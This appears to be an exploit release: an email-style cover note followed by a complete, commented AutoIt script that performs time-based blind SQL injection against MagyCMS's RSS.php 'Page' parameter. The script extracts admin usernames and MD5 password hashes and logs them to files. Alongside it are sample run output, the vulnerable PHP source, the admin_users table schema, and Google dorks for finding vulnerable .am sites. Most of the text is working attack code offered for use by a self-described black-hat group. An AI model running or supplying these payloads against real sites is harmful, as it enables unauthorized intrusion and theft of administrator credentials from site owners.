Hello Dear ЗАРАЗА,
Please see attach.
Attached file is commented and complete exploit which is written in AUTOIT.
It exploits targetted cms using time based way and obtains default 5 usernames + corresponding MD5 passwords from target site.
If anything unclear please let us know.
TIA as always.
/AkaStep
poc.au3
#Region ;**** Directives created by AutoIt3Wrapper_GUI****
#AutoIt3Wrapper_Outfile=cpl.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI****
#NoTrayIcon
#include <Array.au3>
#include <Inet.au3>
#include <String.au3>
#include <File.au3>
#cs
THIS IS A COMPLETE EXPLOIT WHICH IS WRITEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
THIS IS A CONSOLE APPLICATION.
IT'S MAIN PURPOSE TO EXPLOIT BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING TIME BASED WAY and obtain usernames + MD5 passwords.
Default it'll obtain 5 usernames and corresponding MD5 PASSWORDS from vulnerable site.
Since it uses time based way it is really slow exploit.But it is more convenient way than manual work;)
In fact i coded it For Fun because we always prefer manual work.
#ce
#cs
============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ==================
Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected)
Vendor: http://www.emagy.com && broncoway.com
ShouTz to mariaoza;)
CAMOUFL4G3 says: FreeDom is Paradise :P
DORK 1:
google+ site:am Website by Broncoway
DORK 2: google+ site:am inurl: /magycms/
Admin Panel:
site.tld/magycms/Admin/
or
site.tld/magycms/Admin/Login.php
Demo: http://www.sgp.am
Example usage of exploit:
cmd.exe
> D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/
######################################################
######################################################
[+] Reply from target site: [+]
[+] Trying to get average value for sleep(1) if condition is TRUE…[+]
[+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt… [+]
Total 4 users *
[+] Exit! [+]
Vulnerable Code Section:
========================== BEGIN ===================================
//magycms/Framework/public/RSS.php?Page=
/*
<?
// Check if data.inc.php is included
if(!isset($FRAMEWORK_PATH))
require_once(dirname(FILE)."/…/…/Admin/Inc/data.inc.php");
require_once(dirname(FILE)."/…/Common.php");
require_once(dirname(FILE)."/…/Links.php");
require_once(dirname(FILE)."/…/URL.php");
require_once($CMS_ROOTPATH . 'Admin/Inc/db/adodb.inc.php');
/**
* Returns News Category for page with passed name
*
* @param string $page
* @return int ID of category
*/
function getCatByPage($page)
{
global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
// Get Page ID for fetching Category
$query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch category form DB;
$query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
return $row[0];
}
//////////////////// Opening database connection ////////////////
$db = &ADONewConnection($DBType);
$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
// Switch to the specified charset
if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");
///////////////////////// Get Site ID ///////////////////////////
if (isset($_GET['site'])) {
$SITEID = $_GET['site'];
if (!is_numeric($SITEID))
$SITEID = 1;
} else {
$SITEID = 1;
}
////////////////// Get site URL from DB /////////////////////////
$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
$Root_URL = "aaa";
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$Root_URL = $row[0];
}
//echo($Root_URL."<br>");
////////////////// Retrieving Language Prefixes /////////////////
$Lang_Prefix = array();
$hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID");
if($hpResult) {
for($i = 0; $i < $hpResult->RowCount(); $i++) {
$apResult = $hpResult->FetchRow();
$Lang_Prefix[$apResult[0]] = $apResult[1];
}
}
///////////////////////// Determine language ////////////////////
if (isset($_GET['lang'])) {
$lang = $_GET['lang'];
if (!is_numeric($lang))
$lang = GetSiteSetting('Default_lang');
} else {
$lang = GetSiteSetting('Default_lang');
}
///////////////////////// Determine news Page and Category //////
$cat = -1;
$page = "";
if (isset($_GET['Page'])) {
$page = $_GET['Page'];
$cat = getCatByPage($page);
}
//////////////////// Get Page information if such exists ////////
$title = "News";
$text = "";
if ($page != "")
{
$pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($pQuery);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch Title and Text form DB;
$pQuery = "SELECT Title, Text
FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID
WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID";
$hResult = $db->Execute($pQuery);
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$title = $row[0];
$text = $row[1];
}
}
// Construct link to News page
$mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang);
///////////////////////// GET NEWS //////////////////////////////
if ($cat == -1)
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID";
else
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat";
$hResult = $db->Execute($mainQuery);
// check if there is something to echo
if (!$hResult->NumRows())
die();
///////////////////////// Echo News in RSS //////////////////////
CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]);
for ($i = 0; $i < $hResult->NumRows(); $i++)
{
$row = $hResult->FetchRow();
$today = date("Y-m-d H:i:s");
$startDate = $row[4];
$endDate = $row[5];
$startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate);
$endDateIsOK = (substr($endDate, 0, 10) == "0000-00-00" || $today <= $endDate);
if ( $startDateIsOK && $endDateIsOK )
{
$link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}");
CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]);
}
}
CRSS::echoFooter();
?>
<?
class CRSS {
public static function echoHeader ($title, $link, $desc, $lastBD, $lang)
{
// send XML header
header('Content-Type: application/rss+xml; charset=utf-8');
// echo XML header
echo('<?xml version="1.0" encoding="utf-8"?>');
// echo RSS opening tags
echo('<rss version="2.0"><channel>\n');
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
if ($lastBD != "") echo ("<lastBuildDate>$lastBD Mon, 12 Sep 2005 18:37:00 GMT</lastBuildDate>\n");
if ($lang != "") echo ("<language>$lang en-us</language>\n");
}
public static function echoFooter ()
{
// echo RSS closing tags
echo('</channel></rss>');
}
public static function echoItem($title, $link, $guid, $pubDate, $desc)
{
// Strip undesired characters from description
$desc = ereg_replace("&[^;]*;", "", $desc);
$desc = strip_tags($desc);
// Turn Published date into RFC format
$time = strtotime($pubDate);
$pubDate = gmdate("r", $time);
// Echo the item
echo ("<item>\n");
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($guid != "") echo ("<guid>$guid</guid>\n");
if ($pubDate != "") echo ("<pubDate>$pubDate</pubDate>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
echo ("</item>\n");
}
}
?>
*/
========================= END OF VULNERABLE CODE SECTION ===========================
mysql> show tables \g
±------------------------+
| Tables_in_SNIP_SNIP_SNIP|
±------------------------+
| admin_menus |
| admin_menus_category |
| admin_menus_permissions |
| admin_users |
| banner_categories |
| banners |
| banners_data |
| banners_struct |
| cms_languages |
| cms_messages_categories |
| cms_messages_data |
| cms_messages_struct |
| cms_settings |
| core_messages |
| counter |
±------------------------+
15 rows in set (0.00 sec)
mysql> explain admin_users \g
±---------±-----------------±-----±----±--------±---------------+
| Field | Type | Null | Key | Default | Extra |
±---------±-----------------±-----±----±--------±---------------+
| ID | int(10) unsigned | NO | PRI | NULL | auto_increment |
| Username | varchar(100) | YES | | 0 | |
| Password | varchar(100) | YES | | 0 | |
| GUID | varchar(32) | YES | | 0 | |
| Level | int(10) unsigned | YES | MUL | 0 | |
| Name | varchar(100) | YES | | 0 | |
| Email | varchar(45) | YES | | 0 | |
| MID | int(10) unsigned | YES | | 0 | |
±---------±-----------------±-----±----±--------±---------------+
8 rows in set (0.00 sec)
A R E Y O U R E A D Y?
LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!
#ce
Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd
;// COMMAND LINE //
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld')
Exit
EndIf
$host=$CmdLine[1]
if $host='' Then
ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
Exit
EndIf
ConsoleWrite(@CRLF)
$hellomsg= _StringRepeat('#',54) & @CRLF
$allmsg=$hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
'# Exploitation technique: Time Based #' & @CRLF & _
'# Author: AkaStep & BOT_25 #' & @CRLF & _
$hellomsg;
ConsoleWrite($allmsg);
$useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1';
#cs
First checking is here any internet connection?
#ce
$separator=@CRLF & _StringRepeat('-',40) & @CRLF;
ConsoleWrite($separator & '[+] Verifying your internet connection… Please Wait…[+] ' & $separator)
Sleep(1500)
$hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD)
HttpSetUserAgent($useragent)
$is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True);
if @error Then
ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+] Can't continue…Exit. [+] " & $separator);
Exit
EndIf
ConsoleWrite($separator & '[+] Inet Connection is OK … [+] ' & $separator)
$target=$host & "/magycms/Framework/public/RSS.php?Page="
;// Vulnerable versions of magycms always panics here by exposing following message to public.
$isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P
$possiblevals='';//initializing of variable…
$forusernames='';// initializing it too…
for $i=28 to 61
$forusernames&=Chr(Asc("A")+$i) & @CRLF
Next
for $i=0 To 9
$possiblevals&=$i & @CRLF
; nums from 0 1 2 3 4 5 6 7 8 up to 9
Next
; then alphas from a b c d e up to f
$forusernames&=$possiblevals;
$possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF
$array=StringSplit($possiblevals,@CRLF,3)
$bruteusernames=StringSplit($forusernames,@CRLF,3);
$i='';//reset.
ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait…[+]' & $separator);
$maybe=_INetGetSource($target & "'",TRUE) ;//verifying…Is target site vulnerable?
if StringInStr($maybe,$isvulnerable,0) Then
$true='vulnerable'; // GPC=OFF
ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _
'[+] Trying to get average value for sleep(1) if condition is TRUE…[+]' & @CRLF & $separator & '[+] Please wait… [+] ' & $separator & @CRLF);
$additionalchecking_needed='false';
;// Will check 3 times (with TRUE condition) to get optimal avg value.
;//////////////////// Responce time when condition is TRUE //////////////
local $docalc;
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='8',sleep(1),0))– AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$docalcavg=Int($docalc/3);//avg value for sleep(1).
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator);
;////////////// EOF TRUE CONDITION CHECKING ///////////////////////////
;////////////////////// WITH FALSE CONDITION ///////////////////////////
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))– AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$avgfalsecondition=Int($docalc/3);
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator);
;//////////////// END OF FALSE CONDITION ///////////////////////////////
getusername();// Fetch usernames Baby)//
Else
$true='not vulnerable'; //GPC =ON ?
ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
;// Lazy to verify it using another technique.
Exit
EndIf
Func getusername()
;//Brain f****cking
Local $oldoffset=0
$USERNAMES='';
ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table… Please wait… [+] ' & $separator)
$usernamen='';
$tyi=0;
$x=0;
$stopat=0;
do
$tyi+=1
$stopat+=1
if $tyi=21 Then
$tyi=1;
$x+=1
$USERNAMES&=$usernamen & @CRLF
$usernamen='';//reset
EndIf
$limitval= ' limit 1 offset ' & $x
if $x<6 and $stopat<=5160 Then
for $q=1 To UBound($bruteusernames) - 2
$fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] & "',sleep(1),0) from admin_users" &$limitval & ")– AnD 4='4" & @CRLF
$timer=TimerInit();
HttpSetUserAgent($useragent);
$inethandle=_INetGetSource($fetch_username,True)
$diftime=TimerDiff($timer);
if ($diftime/$docalcavg)>=0.8 Then
$usernamen&=$bruteusernames[$q]
ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Responce Time: ' & $diftime & ' ms. Logging to axa.txt… [+]' & @CRLF);
FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Responce Time: ' & $diftime & ' ms ' & @CRLF & $separator)
EndIf
$timer='';
$inethandle='';
$diftime='';
Next
;//
EndIf
until $x=6
$USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3);
; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY);
$y='';
for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1
if Not $USERNAMES_IN_ARRAY[$i]='' Then
$y+=1;
ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & '] [#]' & $separator)
EndIf
Next
$i='';
ConsoleWrite($separator & '* Total ' & $y & ' users *' & $separator)
$y='';
ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)
ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait… [+]' & $separator)
;// debug ok! Exit //
MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.//
EndFunc;=> getusername();
;//Below:Get passwords Function.
Func MD5EDPASSWORD()
Local $stopat;
Local $md5hash;
$MD5HASHSTRINGS='';
if $true='vulnerable' Then
for $rt=0 To 6
if not $md5hash='' Then
$MD5HASHSTRINGS&=$md5hash & @CRLF
EndIf
$md5hash='';// we need reset obtained hash here if offset incremented.
$stopat+=1;
if $rt<6 And $stopat<=3072 Then
for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it.
for $i=0 to UBound($array) - 2
$dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")– AND 5='5"
$doittime=TimerInit();
HttpSetUserAgent($useragent);
$trigger2=_INetGetSource($target & $dynamicpayload,TRUE)
$responcetime=TimerDiff($doittime);
if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it!
$md5hash&=$array[$i]
$howmuchneeded=32-StringLen($md5hash);
if $howmuchneeded='0' then
$howmuchneeded=' NONE '
EndIf
$tolog=$separator & '[+] TRUE AT OFFSET [' & $rt & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Responce Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF & 'Logging to axa.txt… ' & $separator
ConsoleWrite($tolog);
FileWrite('axa.txt',$tolog);
$tolog='';
EndIf
Next
Next
EndIf
Next
;// DISPLAYING PLUS SAVING TO MAINLOG.TXT
$MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3);
for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2
if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then
$dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] & ']' & $separator
EndIf
Next
ConsoleWrite($separator & $dd & $separator)
FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : mainlog.txt [+]' & $separator)
for $i=0 to 2
Sleep(1000);
Beep(200,300);
Next
ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)
ConsoleWrite('[+] Exit! [+]');
Exit;
EndIf
EndFunc;=> MD5EDPASSWORD();
#cs
Thats All!
Thanks + Respect to all friends!
/AkaStep & BOT_25
#ce